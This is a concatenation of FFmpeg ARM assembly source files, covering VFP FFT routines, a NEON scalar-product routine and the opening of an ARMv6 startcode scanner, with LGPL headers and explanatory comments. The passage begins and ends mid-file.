vst1.32 {d22-d23},[r12,:128]!
vand q2, q1, q8
vbic q3, q1, q8
vadd.f32 q1, q0, q2
vsub.f32 q0, q0, q3
subs r2, r2, #8
ble 2f
vld1.32 {d24-d25},[r1,:128]!
vld1.32 {d22-d23},[r0,:128]!
vcle.s32 q8, q12, #0
vand q9, q11, q10
veor q12, q12, q9
vst1.32 {d2-d3}, [r3, :128]!
vst1.32 {d0-d1}, [r12,:128]!
vand q2, q12, q8
vbic q3, q12, q8
vadd.f32 q12, q11, q2
vsub.f32 q11, q11, q3
b 1b
@ Drain: store the last in-flight block.
2: vst1.32 {d2-d3}, [r3, :128]!
vst1.32 {d0-d1}, [r12,:128]!
it lt
bxlt lr
@ Tail / blocksize==4: single unpipelined block.
3: vld1.32 {d2-d3}, [r1,:128]
vld1.32 {d0-d1}, [r0,:128]
vcle.s32 q8, q1, #0
vand q9, q0, q10
veor q1, q1, q9
vand q2, q1, q8
vbic q3, q1, q8
vadd.f32 q1, q0, q2
vsub.f32 q0, q0, q3
vst1.32 {d2-d3}, [r0,:128]!
vst1.32 {d0-d1}, [r1,:128]!
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 19,099
|
ffmpeg-3.0.2/libavcodec/arm/fft_vfp.S
|
/*
* Copyright (c) 2013 RISC OS Open Ltd
* Author: Ben Avison <bavison@riscosopen.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ The fftx_internal_vfp versions of the functions obey a modified AAPCS:
@ VFP is in RunFast mode, vector length 4, stride 1 thoroughout, and
@ all single-precision VFP registers may be corrupted on exit. The a2
@ register may not be clobbered in these functions, as it holds the
@ stored original FPSCR.
@ void ff_fft_calc_vfp(FFTContext *s, FFTComplex *z)
@ a1 = context, a2 = data.  Reads nbits from offset 0 of the context
@ (NOTE(review): assumes nbits is the first struct member — confirm
@ against FFTContext layout) and tail-dispatches through fft_tab_vfp;
@ the -8 bias maps nbits==2 (4 points) to the first table entry.
function ff_fft_calc_vfp, export=1
ldr ip, [a1, #0] @ nbits
mov a1, a2
movrel a2, (fft_tab_vfp - 8)
ldr pc, [a2, ip, lsl #2]
endfunc
@ Dispatch table indexed by (nbits - 2): entry i handles 2^(i+2) points.
const fft_tab_vfp, relocate=1
.word fft4_vfp
.word fft8_vfp
.word X(ff_fft16_vfp) @ this one alone is exported
.word fft32_vfp
.word fft64_vfp
.word fft128_vfp
.word fft256_vfp
.word fft512_vfp
.word fft1024_vfp
.word fft2048_vfp
.word fft4096_vfp
.word fft8192_vfp
.word fft16384_vfp
.word fft32768_vfp
.word fft65536_vfp
endconst
@ In-place 4-point FFT on the interleaved re/im array at a1.
@ Runs with the caller's FPSCR (scalar VFP; the RunFast/vector-length
@ setup is only done by the larger fftN_vfp wrappers).  Uses only the
@ caller-saved registers s0-s15.
function fft4_vfp
vldr d0, [a1, #0*2*4] @ s0,s1 = z[0]
vldr d4, [a1, #1*2*4] @ s8,s9 = z[1]
vldr d1, [a1, #2*2*4] @ s2,s3 = z[2]
vldr d5, [a1, #3*2*4] @ s10,s11 = z[3]
@ stall
vadd.f s12, s0, s8 @ i0
vadd.f s13, s1, s9 @ i1
vadd.f s14, s2, s10 @ i2
vadd.f s15, s3, s11 @ i3
vsub.f s8, s0, s8 @ i4
vsub.f s9, s1, s9 @ i5
vsub.f s10, s2, s10 @ i6
vsub.f s11, s3, s11 @ i7
@ stall
@ stall
vadd.f s0, s12, s14 @ z[0].re
vsub.f s4, s12, s14 @ z[2].re
vadd.f s1, s13, s15 @ z[0].im
vsub.f s5, s13, s15 @ z[2].im
vadd.f s7, s9, s10 @ z[3].im
vsub.f s3, s9, s10 @ z[1].im
vadd.f s2, s8, s11 @ z[1].re
vsub.f s6, s8, s11 @ z[3].re
@ stall
@ stall
vstr d0, [a1, #0*2*4]
vstr d2, [a1, #2*2*4]
@ stall
@ stall
vstr d1, [a1, #1*2*4]
vstr d3, [a1, #3*2*4]
bx lr
endfunc
@ First part of the 8-point FFT: FFT4 on z[0..3] combined with the
@ butterflies and TRANSFORM steps against z[4..7].  Requires FPSCR
@ vector mode LEN=4 (set up by the fftN_vfp wrappers) — instructions
@ marked "vector op" operate on banks of 4 consecutive s-registers.
@ Register moves between banks are staged through the z[] memory.
@ Leaves the z[1]/z[3] results in d8/d9 for macro_fft8_tail to store,
@ so fft16 can overlap the stores with further work.
.macro macro_fft8_head
@ FFT4
vldr d4, [a1, #0 * 2*4]
vldr d6, [a1, #1 * 2*4]
vldr d5, [a1, #2 * 2*4]
vldr d7, [a1, #3 * 2*4]
@ BF
vldr d12, [a1, #4 * 2*4]
vadd.f s16, s8, s12 @ vector op
vldr d14, [a1, #5 * 2*4]
vldr d13, [a1, #6 * 2*4]
vldr d15, [a1, #7 * 2*4]
vsub.f s20, s8, s12 @ vector op
vadd.f s0, s16, s18
vsub.f s2, s16, s18
vadd.f s1, s17, s19
vsub.f s3, s17, s19
vadd.f s7, s21, s22
vsub.f s5, s21, s22
vadd.f s4, s20, s23
vsub.f s6, s20, s23
vsub.f s20, s24, s28 @ vector op
vstr d0, [a1, #0 * 2*4] @ transfer s0-s7 to s24-s31 via memory
vstr d1, [a1, #1 * 2*4]
vldr s0, cos1pi4
vadd.f s16, s24, s28 @ vector op
vstr d2, [a1, #2 * 2*4]
vstr d3, [a1, #3 * 2*4]
vldr d12, [a1, #0 * 2*4]
@ TRANSFORM
vmul.f s20, s20, s0 @ vector x scalar op
vldr d13, [a1, #1 * 2*4]
vldr d14, [a1, #2 * 2*4]
vldr d15, [a1, #3 * 2*4]
@ BUTTERFLIES
vadd.f s0, s18, s16
vadd.f s1, s17, s19
vsub.f s2, s17, s19
vsub.f s3, s18, s16
vadd.f s4, s21, s20
vsub.f s5, s21, s20
vadd.f s6, s22, s23
vsub.f s7, s22, s23
vadd.f s8, s0, s24 @ vector op
vstr d0, [a1, #0 * 2*4] @ transfer s0-s3 to s12-s15 via memory
vstr d1, [a1, #1 * 2*4]
vldr d6, [a1, #0 * 2*4]
vldr d7, [a1, #1 * 2*4]
vadd.f s1, s5, s6
vadd.f s0, s7, s4
vsub.f s2, s5, s6
vsub.f s3, s7, s4
vsub.f s12, s24, s12 @ vector op
vsub.f s5, s29, s1
vsub.f s4, s28, s0
vsub.f s6, s30, s2
vsub.f s7, s31, s3
vadd.f s16, s0, s28 @ vector op
vstr d6, [a1, #4 * 2*4]
vstr d7, [a1, #6 * 2*4]
vstr d4, [a1, #0 * 2*4]
vstr d5, [a1, #2 * 2*4]
vstr d2, [a1, #5 * 2*4]
vstr d3, [a1, #7 * 2*4]
.endm
@ Store the two results (d8/d9 = z[1], z[3]) deferred by
@ macro_fft8_head; split out so callers can overlap these stores.
.macro macro_fft8_tail
vstr d8, [a1, #1 * 2*4]
vstr d9, [a1, #3 * 2*4]
.endm
@ 8-point FFT body under the modified AAPCS described at the top of
@ this file (RunFast, vector length 4; a2 must be preserved as it
@ holds the caller's saved FPSCR).
function .Lfft8_internal_vfp
macro_fft8_head
macro_fft8_tail
bx lr
endfunc
@ Standard-ABI wrapper for the 8-point FFT: switches FPSCR into
@ RunFast / vector-length-4 / stride-1 mode, preserves the callee-saved
@ VFP registers, runs the internal routine and restores state.
@ The original FPSCR is carried in a2 (see modified-AAPCS note above).
function fft8_vfp
ldr a3, =0x03030000 @ RunFast mode, vector length 4, stride 1
fmrx a2, FPSCR
fmxr FPSCR, a3
vpush {s16-s31}
mov ip, lr
bl .Lfft8_internal_vfp
vpop {s16-s31}
fmxr FPSCR, a2
bx ip
endfunc
.align 3
cos1pi4: @ cos(1*pi/4) = sqrt(2)/2
.float 0.707106769084930419921875
cos1pi8: @ cos(1*pi/8) = sqrt(2+sqrt(2))/2
.float 0.92387950420379638671875
cos3pi8: @ cos(3*pi/8) = sqrt(2-sqrt(2))/2
.float 0.3826834261417388916015625
@ 16-point FFT body under the modified AAPCS (RunFast, FPSCR vector
@ length 4; a2 holds the caller's saved FPSCR and must not be touched).
@ Structure: fft8 on z[0..7], fft4 on z[8..11] and z[12..15], then the
@ four TRANSFORM twiddle/butterfly combines.  Instruction order is
@ hand-scheduled around VFP vector-bank hazards — loads/stores staged
@ through z[] move data between register banks.
function .Lfft16_internal_vfp
macro_fft8_head
@ FFT4(z+8)
vldr d10, [a1, #8 * 2*4]
vldr d12, [a1, #9 * 2*4]
vldr d11, [a1, #10 * 2*4]
vldr d13, [a1, #11 * 2*4]
macro_fft8_tail
vadd.f s16, s20, s24 @ vector op
@ FFT4(z+12)
vldr d4, [a1, #12 * 2*4]
vldr d6, [a1, #13 * 2*4]
vldr d5, [a1, #14 * 2*4]
vsub.f s20, s20, s24 @ vector op
vldr d7, [a1, #15 * 2*4]
vadd.f s0, s16, s18
vsub.f s4, s16, s18
vadd.f s1, s17, s19
vsub.f s5, s17, s19
vadd.f s7, s21, s22
vsub.f s3, s21, s22
vadd.f s2, s20, s23
vsub.f s6, s20, s23
vadd.f s16, s8, s12 @ vector op
vstr d0, [a1, #8 * 2*4]
vstr d2, [a1, #10 * 2*4]
vstr d1, [a1, #9 * 2*4]
vsub.f s20, s8, s12
vstr d3, [a1, #11 * 2*4]
@ TRANSFORM(z[2],z[6],z[10],z[14],cos1pi4,cos1pi4)
vldr d12, [a1, #10 * 2*4]
vadd.f s0, s16, s18
vadd.f s1, s17, s19
vsub.f s6, s16, s18
vsub.f s7, s17, s19
vsub.f s3, s21, s22
vadd.f s2, s20, s23
vadd.f s5, s21, s22
vsub.f s4, s20, s23
vstr d0, [a1, #12 * 2*4]
vmov s0, s6
@ TRANSFORM(z[1],z[5],z[9],z[13],cos1pi8,cos3pi8)
vldr d6, [a1, #9 * 2*4]
vstr d1, [a1, #13 * 2*4]
vldr d1, cos1pi4 @ s2 = cos1pi4, s3 = cos1pi8
vstr d2, [a1, #15 * 2*4]
vldr d7, [a1, #13 * 2*4]
vadd.f s4, s25, s24
vsub.f s5, s25, s24
vsub.f s6, s0, s7
vadd.f s7, s0, s7
vmul.f s20, s12, s3 @ vector op
@ TRANSFORM(z[3],z[7],z[11],z[15],cos3pi8,cos1pi8)
vldr d4, [a1, #11 * 2*4]
vldr d5, [a1, #15 * 2*4]
vldr s1, cos3pi8
vmul.f s24, s4, s2 @ vector * scalar op
vmul.f s28, s12, s1 @ vector * scalar op
vmul.f s12, s8, s1 @ vector * scalar op
vadd.f s4, s20, s29
vsub.f s5, s21, s28
vsub.f s6, s22, s31
vadd.f s7, s23, s30
vmul.f s8, s8, s3 @ vector * scalar op
vldr d8, [a1, #1 * 2*4]
vldr d9, [a1, #5 * 2*4]
vldr d10, [a1, #3 * 2*4]
vldr d11, [a1, #7 * 2*4]
vldr d14, [a1, #2 * 2*4]
vadd.f s0, s6, s4
vadd.f s1, s5, s7
vsub.f s2, s5, s7
vsub.f s3, s6, s4
vadd.f s4, s12, s9
vsub.f s5, s13, s8
vsub.f s6, s14, s11
vadd.f s7, s15, s10
vadd.f s12, s0, s16 @ vector op
vstr d0, [a1, #1 * 2*4]
vstr d1, [a1, #5 * 2*4]
vldr d4, [a1, #1 * 2*4]
vldr d5, [a1, #5 * 2*4]
vadd.f s0, s6, s4
vadd.f s1, s5, s7
vsub.f s2, s5, s7
vsub.f s3, s6, s4
vsub.f s8, s16, s8 @ vector op
vstr d6, [a1, #1 * 2*4]
vstr d7, [a1, #5 * 2*4]
vldr d15, [a1, #6 * 2*4]
vsub.f s4, s20, s0
vsub.f s5, s21, s1
vsub.f s6, s22, s2
vsub.f s7, s23, s3
vadd.f s20, s0, s20 @ vector op
vstr d4, [a1, #9 * 2*4]
@ TRANSFORM_ZERO(z[0],z[4],z[8],z[12])
vldr d6, [a1, #8 * 2*4]
vstr d5, [a1, #13 * 2*4]
vldr d7, [a1, #12 * 2*4]
vstr d2, [a1, #11 * 2*4]
vldr d8, [a1, #0 * 2*4]
vstr d3, [a1, #15 * 2*4]
vldr d9, [a1, #4 * 2*4]
vadd.f s0, s26, s24
vadd.f s1, s25, s27
vsub.f s2, s25, s27
vsub.f s3, s26, s24
vadd.f s4, s14, s12
vadd.f s5, s13, s15
vsub.f s6, s13, s15
vsub.f s7, s14, s12
vadd.f s8, s0, s28 @ vector op
vstr d0, [a1, #3 * 2*4]
vstr d1, [a1, #7 * 2*4]
vldr d6, [a1, #3 * 2*4]
vldr d7, [a1, #7 * 2*4]
vsub.f s0, s16, s4
vsub.f s1, s17, s5
vsub.f s2, s18, s6
vsub.f s3, s19, s7
vsub.f s12, s28, s12 @ vector op
vadd.f s16, s4, s16 @ vector op
vstr d10, [a1, #3 * 2*4]
vstr d11, [a1, #7 * 2*4]
vstr d4, [a1, #2 * 2*4]
vstr d5, [a1, #6 * 2*4]
vstr d0, [a1, #8 * 2*4]
vstr d1, [a1, #12 * 2*4]
vstr d6, [a1, #10 * 2*4]
vstr d7, [a1, #14 * 2*4]
vstr d8, [a1, #0 * 2*4]
vstr d9, [a1, #4 * 2*4]
bx lr
endfunc
@ Exported 16-point FFT: same wrapper pattern as fft8_vfp — switch
@ FPSCR to RunFast / vector-length-4 / stride-1, preserve callee-saved
@ VFP registers, call the internal routine, restore.  a2 carries the
@ original FPSCR across the call (modified AAPCS).
function ff_fft16_vfp, export=1
ldr a3, =0x03030000 @ RunFast mode, vector length 4, stride 1
fmrx a2, FPSCR
fmxr FPSCR, a3
vpush {s16-s31}
mov ip, lr
bl .Lfft16_internal_vfp
vpop {s16-s31}
fmxr FPSCR, a2
bx ip
endfunc
@ One radix-4 combine pass over the four quarter-transforms of a
@ 4*\n-point FFT.  \z0..\z3 index the four quarters; the word offsets
@ o1/o2/o3 are .set by def_fft before invocation (they fold the
@ quarter spacing into the addressing so \z1..\z3 may alias \z0).
@ v5 walks the ff_cos_N twiddle table forwards (wre), v6 backwards
@ (wim).  Runs under the modified AAPCS (FPSCR vector length 4);
@ the loop body processes two complex points per quarter per
@ iteration, software-pipelined; the code after the loop is the final
@ iteration with the pointer increments peeled off.
.macro pass n, z0, z1, z2, z3
add v6, v5, #4*2*\n
@ TRANSFORM_ZERO(z[0],z[o1],z[o2],z[o3])
@ TRANSFORM(z[1],z[o1+1],z[o2+1],z[o3+1],wre[1],wim[-1])
@ TRANSFORM(z[0],z[o1],z[o2],z[o3],wre[0],wim[0])
@ TRANSFORM(z[1],z[o1+1],z[o2+1],z[o3+1],wre[1],wim[-1])
vldr d8, [\z2, #8*(o2+1)] @ s16,s17
vldmdb v6!, {s2}
vldr d9, [\z3, #8*(o3+1)] @ s18,s19
vldmia v5!, {s0,s1} @ s0 is unused
vldr s7, [\z2, #8*o2] @ t1
vmul.f s20, s16, s2 @ vector * scalar
vldr s0, [\z3, #8*o3] @ t5
vldr s6, [\z2, #8*o2+4] @ t2
vldr s3, [\z3, #8*o3+4] @ t6
vmul.f s16, s16, s1 @ vector * scalar
ldr a4, =\n-1
1: add \z0, \z0, #8*2
.if \n*4*2 >= 512
add \z1, \z1, #8*2
.endif
.if \n*4*2 >= 256
add \z2, \z2, #8*2
.endif
.if \n*4*2 >= 512
add \z3, \z3, #8*2
.endif
@ up to 2 stalls (VFP vector issuing / waiting for s0)
@ depending upon whether this is the first iteration and
@ how many add instructions are inserted above
vadd.f s4, s0, s7 @ t5
vadd.f s5, s6, s3 @ t6
vsub.f s6, s6, s3 @ t4
vsub.f s7, s0, s7 @ t3
vldr d6, [\z0, #8*0-8*2] @ s12,s13
vadd.f s0, s16, s21 @ t1
vldr d7, [\z1, #8*o1-8*2] @ s14,s15
vsub.f s1, s18, s23 @ t5
vadd.f s8, s4, s12 @ vector + vector
@ stall (VFP vector issuing)
@ stall (VFP vector issuing)
@ stall (VFP vector issuing)
vsub.f s4, s12, s4
vsub.f s5, s13, s5
vsub.f s6, s14, s6
vsub.f s7, s15, s7
vsub.f s2, s17, s20 @ t2
vadd.f s3, s19, s22 @ t6
vstr d4, [\z0, #8*0-8*2] @ s8,s9
vstr d5, [\z1, #8*o1-8*2] @ s10,s11
@ stall (waiting for s5)
vstr d2, [\z2, #8*o2-8*2] @ s4,s5
vadd.f s4, s1, s0 @ t5
vstr d3, [\z3, #8*o3-8*2] @ s6,s7
vsub.f s7, s1, s0 @ t3
vadd.f s5, s2, s3 @ t6
vsub.f s6, s2, s3 @ t4
vldr d6, [\z0, #8*1-8*2] @ s12,s13
vldr d7, [\z1, #8*(o1+1)-8*2] @ s14,s15
vldr d4, [\z2, #8*o2] @ s8,s9
vldmdb v6!, {s2,s3}
vldr d5, [\z3, #8*o3] @ s10,s11
vadd.f s20, s4, s12 @ vector + vector
vldmia v5!, {s0,s1}
vldr d8, [\z2, #8*(o2+1)] @ s16,s17
@ stall (VFP vector issuing)
vsub.f s4, s12, s4
vsub.f s5, s13, s5
vsub.f s6, s14, s6
vsub.f s7, s15, s7
vmul.f s12, s8, s3 @ vector * scalar
vstr d10, [\z0, #8*1-8*2] @ s20,s21
vldr d9, [\z3, #8*(o3+1)] @ s18,s19
vstr d11, [\z1, #8*(o1+1)-8*2] @ s22,s23
vmul.f s8, s8, s0 @ vector * scalar
vstr d2, [\z2, #8*(o2+1)-8*2] @ s4,s5
@ stall (waiting for s7)
vstr d3, [\z3, #8*(o3+1)-8*2] @ s6,s7
vmul.f s20, s16, s2 @ vector * scalar
@ stall (VFP vector issuing)
@ stall (VFP vector issuing)
@ stall (VFP vector issuing)
vadd.f s7, s8, s13 @ t1
vsub.f s6, s9, s12 @ t2
vsub.f s0, s10, s15 @ t5
vadd.f s3, s11, s14 @ t6
vmul.f s16, s16, s1 @ vector * scalar
subs a4, a4, #1
bne 1b
@ What remains is identical to the first two indentations of
@ the above, but without the increment of z
vadd.f s4, s0, s7 @ t5
vadd.f s5, s6, s3 @ t6
vsub.f s6, s6, s3 @ t4
vsub.f s7, s0, s7 @ t3
vldr d6, [\z0, #8*0] @ s12,s13
vadd.f s0, s16, s21 @ t1
vldr d7, [\z1, #8*o1] @ s14,s15
vsub.f s1, s18, s23 @ t5
vadd.f s8, s4, s12 @ vector + vector
vsub.f s4, s12, s4
vsub.f s5, s13, s5
vsub.f s6, s14, s6
vsub.f s7, s15, s7
vsub.f s2, s17, s20 @ t2
vadd.f s3, s19, s22 @ t6
vstr d4, [\z0, #8*0] @ s8,s9
vstr d5, [\z1, #8*o1] @ s10,s11
vstr d2, [\z2, #8*o2] @ s4,s5
vadd.f s4, s1, s0 @ t5
vstr d3, [\z3, #8*o3] @ s6,s7
vsub.f s7, s1, s0 @ t3
vadd.f s5, s2, s3 @ t6
vsub.f s6, s2, s3 @ t4
vldr d6, [\z0, #8*1] @ s12,s13
vldr d7, [\z1, #8*(o1+1)] @ s14,s15
vadd.f s20, s4, s12 @ vector + vector
vsub.f s4, s12, s4
vsub.f s5, s13, s5
vsub.f s6, s14, s6
vsub.f s7, s15, s7
vstr d10, [\z0, #8*1] @ s20,s21
vstr d11, [\z1, #8*(o1+1)] @ s22,s23
vstr d2, [\z2, #8*(o2+1)] @ s4,s5
vstr d3, [\z3, #8*(o3+1)] @ s6,s7
.endm
@ Instantiate .Lfft\n_internal_vfp — recursive split into one \n2-point
@ and two \n4-point sub-transforms followed by a radix-4 "pass" — plus
@ the standard-ABI wrapper fft\n_vfp that enters RunFast vector mode.
@ The o1/o2/o3 offsets and pointer layout collapse for smaller sizes
@ where the quarter spacing fits in vldr/vstr immediates, which is why
@ fewer base registers (and fewer saved regs) are needed below 256/512.
.macro def_fft n, n2, n4
function .Lfft\n\()_internal_vfp
.if \n >= 512
push {v1-v6,lr}
.elseif \n >= 256
push {v1-v2,v5-v6,lr}
.else
push {v1,v5-v6,lr}
.endif
mov v1, a1
bl .Lfft\n2\()_internal_vfp
add a1, v1, #8*(\n/4)*2
bl .Lfft\n4\()_internal_vfp
movrelx v5, X(ff_cos_\n), a1
add a1, v1, #8*(\n/4)*3
bl .Lfft\n4\()_internal_vfp
.if \n >= 512
.set o1, 0*(\n/4/2)
.set o2, 0*(\n/4/2)
.set o3, 0*(\n/4/2)
add v2, v1, #8*2*(\n/4/2)
add v3, v1, #8*4*(\n/4/2)
add v4, v1, #8*6*(\n/4/2)
pass (\n/4/2), v1, v2, v3, v4
pop {v1-v6,pc}
.elseif \n >= 256
.set o1, 2*(\n/4/2)
.set o2, 0*(\n/4/2)
.set o3, 2*(\n/4/2)
add v2, v1, #8*4*(\n/4/2)
pass (\n/4/2), v1, v1, v2, v2
pop {v1-v2,v5-v6,pc}
.else
.set o1, 2*(\n/4/2)
.set o2, 4*(\n/4/2)
.set o3, 6*(\n/4/2)
pass (\n/4/2), v1, v1, v1, v1
pop {v1,v5-v6,pc}
.endif
endfunc
function fft\n\()_vfp
ldr a3, =0x03030000 /* RunFast mode, vector length 4, stride 1 */
fmrx a2, FPSCR
fmxr FPSCR, a3
vpush {s16-s31}
mov ip, lr
bl .Lfft\n\()_internal_vfp
vpop {s16-s31}
fmxr FPSCR, a2
bx ip
endfunc
.ltorg @ flush the literal pool after each instantiation
.endm
@ Instantiate every size from 32 to 65536 points; each size \n reuses
@ the \n/2 and \n/4 internal routines generated before it.
def_fft 32, 16, 8
def_fft 64, 32, 16
def_fft 128, 64, 32
def_fft 256, 128, 64
def_fft 512, 256, 128
def_fft 1024, 512, 256
def_fft 2048, 1024, 512
def_fft 4096, 2048, 1024
def_fft 8192, 4096, 2048
def_fft 16384, 8192, 4096
def_fft 32768, 16384, 8192
def_fft 65536, 32768, 16384
|
Akagi201/ffmpeg-xcode
| 2,300
|
ffmpeg-3.0.2/libavcodec/arm/lossless_audiodsp_neon.S
|
/*
* ARM NEON optimised integer operations
* Copyright (c) 2009 Kostya Shishkov
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ scalarproduct_and_madd_int16(/*aligned*/v0,v1,v2,order,mul)
@ int32_t ff_scalarproduct_and_madd_int16(int16_t *v1 /*aligned*/,
@                                         const int16_t *v2,
@                                         const int16_t *v3,
@                                         int order, int mul)
@ r0 = v1 (16-byte aligned, updated in place), r1 = v2, r2 = v3,
@ r3 = order (assumed a positive multiple of 16 -- TODO confirm),
@ mul passed on the stack and splatted into q14.
@ Returns sum(v1[i]*v2[i]) over the ORIGINAL v1 values while doing
@ v1[i] += mul * v3[i] (wrapping 16-bit arithmetic) in the same pass.
@ q0-q3 hold four 32-bit partial-sum accumulators, reduced at the end.
function ff_scalarproduct_and_madd_int16_neon, export=1
vld1.16 {d28[],d29[]}, [sp]
vmov.i16 q0, #0
vmov.i16 q1, #0
vmov.i16 q2, #0
vmov.i16 q3, #0
mov r12, r0 @ write-back pointer for the madd results
1: vld1.16 {d16-d17}, [r0,:128]!
vld1.16 {d18-d19}, [r1]!
vld1.16 {d20-d21}, [r2]!
vld1.16 {d22-d23}, [r0,:128]!
vld1.16 {d24-d25}, [r1]!
vld1.16 {d26-d27}, [r2]!
vmul.s16 q10, q10, q14
vmul.s16 q13, q13, q14
vmlal.s16 q0, d16, d18 @ dot product uses pre-update v1
vmlal.s16 q1, d17, d19
vadd.s16 q10, q8, q10
vadd.s16 q13, q11, q13
vmlal.s16 q2, d22, d24
vmlal.s16 q3, d23, d25
vst1.16 {q10}, [r12,:128]!
subs r3, r3, #16
vst1.16 {q13}, [r12,:128]!
bgt 1b
@ Horizontal reduction of the four accumulators into r0.
vpadd.s32 d16, d0, d1
vpadd.s32 d17, d2, d3
vpadd.s32 d18, d4, d5
vpadd.s32 d19, d6, d7
vpadd.s32 d0, d16, d17
vpadd.s32 d1, d18, d19
vpadd.s32 d2, d0, d1
vpaddl.s32 d3, d2
vmov.32 r0, d3[0]
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 7,543
|
ffmpeg-3.0.2/libavcodec/arm/startcode_armv6.S
|
/*
* Copyright (c) 2013 RISC OS Open Ltd
* Author: Ben Avison <bavison@riscosopen.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ Register aliases for ff_startcode_find_candidate_armv6.
@ RESULT and BUF share a1: the buffer pointer is consumed before the
@ return value is produced.  TMP2/TMP3 reuse ip/lr as extra scratch.
RESULT .req a1
BUF .req a1
SIZE .req a2
PATTERN .req a3
PTR .req a4
DAT0 .req v1
DAT1 .req v2
DAT2 .req v3
DAT3 .req v4
TMP0 .req v5
TMP1 .req v6
TMP2 .req ip
TMP3 .req lr
@ Cachelines (32 bytes) to prefetch ahead of the scan pointer.
#define PRELOAD_DISTANCE 4
@ Scan one word (big-endian loaded).  PATTERN = 0x80008000, so
@ PATTERN lsr #14 = 0x00020002 and TMP0 = (w - 0x00020002) & ~w &
@ 0x80008000 is nonzero iff either halfword of the word is 0 or 1 —
@ i.e. contains a startcode-candidate byte.  Leaves Z clear on a hit;
@ C from the subs survives for the caller's loop control.
.macro innerloop4
ldr DAT0, [PTR], #4
subs SIZE, SIZE, #4 @ C flag survives rest of macro
sub TMP0, DAT0, PATTERN, lsr #14
bic TMP0, TMP0, DAT0
ands TMP0, TMP0, PATTERN
.endm
@ Scan four words (16 bytes) with the same halfword <= 1 test as
@ innerloop4, applied to DAT0-DAT3.  The conditional ands chain only
@ evaluates later words while earlier ones were clean, so on exit
@ Z is clear iff some word hit and TMP0-TMP3 record which.
@ \decrement optionally counts down SIZE (C flag preserved for the
@ caller); \do_preload optionally prefetches ahead.
.macro innerloop16 decrement, do_preload
ldmia PTR!, {DAT0,DAT1,DAT2,DAT3}
.ifnc "\do_preload",""
pld [PTR, #PRELOAD_DISTANCE*32]
.endif
.ifnc "\decrement",""
subs SIZE, SIZE, #\decrement @ C flag survives rest of macro
.endif
sub TMP0, DAT0, PATTERN, lsr #14
sub TMP1, DAT1, PATTERN, lsr #14
bic TMP0, TMP0, DAT0
bic TMP1, TMP1, DAT1
sub TMP2, DAT2, PATTERN, lsr #14
sub TMP3, DAT3, PATTERN, lsr #14
ands TMP0, TMP0, PATTERN
bic TMP2, TMP2, DAT2
it eq
andseq TMP1, TMP1, PATTERN
bic TMP3, TMP3, DAT3
itt eq
andseq TMP2, TMP2, PATTERN
andseq TMP3, TMP3, PATTERN
.endm
/* int ff_startcode_find_candidate_armv6(const uint8_t *buf, int size) */
@ int ff_startcode_find_candidate_armv6(const uint8_t *buf, int size)
@ Returns the offset of the first byte that could begin/continue a
@ startcode (a byte with value 0 or 1 per the halfword test in the
@ innerloop macros), or size if none.  Strategy: byte-scan up to word
@ alignment, then word/4-word/cacheline-aligned scans with PLD; data
@ is read with setend be so halfword tests see bytes in stream order.
@ Labels 90-98 translate a hit inside a scanned word group back into a
@ byte offset, stepping back one byte where the candidate's
@ predecessor is also zero.  Label 60 is the short-buffer byte loop.
function ff_startcode_find_candidate_armv6, export=1
push {v1-v6,lr}
mov PTR, BUF
@ Ensure there are at least (PRELOAD_DISTANCE+2) complete cachelines to go
@ before using code that does preloads
cmp SIZE, #(PRELOAD_DISTANCE+3)*32 - 1
blo 60f
@ Get to word-alignment, 1 byte at a time
tst PTR, #3
beq 2f
1: ldrb DAT0, [PTR], #1
sub SIZE, SIZE, #1
teq DAT0, #0
beq 90f
tst PTR, #3
bne 1b
2: @ Get to 4-word alignment, 1 word at a time
ldr PATTERN, =0x80008000
setend be
tst PTR, #12
beq 4f
3: innerloop4
bne 91f
tst PTR, #12
bne 3b
4: @ Get to cacheline (8-word) alignment
tst PTR, #16
beq 5f
innerloop16 16
bne 93f
5: @ Check complete cachelines, with preloading
@ We need to stop when there are still (PRELOAD_DISTANCE+1)
@ complete cachelines to go
sub SIZE, SIZE, #(PRELOAD_DISTANCE+2)*32
6: innerloop16 , do_preload
bne 93f
innerloop16 32
bne 93f
bcs 6b
@ Preload trailing part-cacheline, if any
tst SIZE, #31
beq 7f
pld [PTR, #(PRELOAD_DISTANCE+1)*32]
@ Check remaining data without doing any more preloads. First
@ do in chunks of 4 words:
7: adds SIZE, SIZE, #(PRELOAD_DISTANCE+2)*32 - 16
bmi 9f
8: innerloop16 16
bne 93f
bcs 8b
@ Then in words:
9: adds SIZE, SIZE, #16 - 4
bmi 11f
10: innerloop4
bne 91f
bcs 10b
11: setend le
@ Check second byte of final halfword
ldrb DAT0, [PTR, #-1]
